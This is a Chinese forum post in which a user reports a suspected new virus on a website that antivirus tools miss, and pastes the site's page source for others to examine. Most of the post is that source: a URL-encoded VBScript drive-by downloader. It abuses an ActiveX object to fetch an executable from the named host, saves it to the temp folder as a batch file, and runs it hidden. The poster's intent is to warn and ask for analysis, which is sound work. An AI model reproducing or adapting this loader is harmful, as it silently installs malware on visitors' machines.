貌似发现新病毒!行为诡异!软件不报!
没有打开运行!
来自某网站 http://binwei888.com
19.14.42 不报警!
http://binwei888.com/gequ.exe
以下是网站代码 jv加密没有时间揭开!有心人看看!
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3Cscript%20language%3D%22VBScript%22%3E%0D%0A%20%0D%0A%20%20%0D%0A%20%20%20%20ppp%3D%22
object%22%0D%0A%20%20%20%0D%0A%20%20%20%20Set%20data%20%3D%20document%2EcreateElement%28ppp%2C%22%22%29%0D%0A%20%20%20%20bbs%20%3D%22Microsoft%2EXMLHTTP%22%0D%0A%20%20%20%20data%2EsetAttribute%20%28%22classid%22%29%2C%20%28%22clsid%3ABD96C556%2D65A3%2D11D0%2D983A%2D00C04FC29E36%22%29%0D%0A%20%20%20%20%0D%0A%20%20%20%20%0D%0A%0D%0A%20%20%20%20Set%20x%20%3D%20data%2ECreate
Object%28bbs%2C%22%22%29%0D%0A%20%20%20%20url%20%3D%20%22http%3A%2F%2Fbinwei888%2Ecom%2Fgequ%2Eexe%22%0D%0A%20%20%20%20%0D%0A%20%20%20%20rrr%3D%22Adodb%2EStream%22%0D%0A%20%20%20%20set%20mm%20%3D%20data%2Ecreate
object%28rrr%2C%22%22%29%0D%0A%20%20%20%20%0D%0A%20%20%20%20mm%2Etype%20%3D%201%20%0D%0A%20%20%20%20%0D%0A%20%20%20%20mm%2Eopen%20%0D%0A%20%20%20%20%0D%0A%20%20%20%20ysha%3D%22GET%22%0D%0A%20%20%20%20%0D%0A%20%20%20%20x%2EOpen%20ysha%2C%20url%2C%20False%0D%0A%20%20%20%20x%2ESend%0D%0A%20%20%20%0D%0A%20%20%20%20%0D%0A%20%20%20%0D%0A%20%20%20%20mm%2Ewrite%20x%2EresponseBody%0D%0A%20%20%20%20%20exe%3D%22h%2Ebat%22%0D%0A%20%20%20%20ht%20%3D%22Scripting%2EFileSystem
Object%22%0D%0A%20%20%20%20Set%20T%20%3D%20Nothing%0D%0A%20%20%20%20set%20F%20%3D%20data%2Ecreate
object%28ht%2C%22%22%29%0D%0A%20%20%20%20set%20tmp%20%3D%20F%2EGetSpecialFolder%282%29%0D%0A%20%20%20%20%20%20%0D%0A%20%20%20%20exe%3D%20F%2EBuildPath%28tmp%2Cexe%29%0D%0A%20%20%20%20mm%2Esavetofile%20exe%2C2%0D%0A%20%20%20%20mm%2Eclose%0D%0A%20%20%20%20set%20Bb%20%3D%20data%2Ecreate
object%28%22Shell%2EApplication%22%2C%22%22%29%0D%0A%20%20%20%20Bb%2EShellExecute%20exe%2C%22%22%2C%22%22%2C%22open%22%2C0%0D%0A%20%20%20%0D%0A%20%20%20%20%3C%2Fscript%3E%0D%0A%20%20%20%0D%0A%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>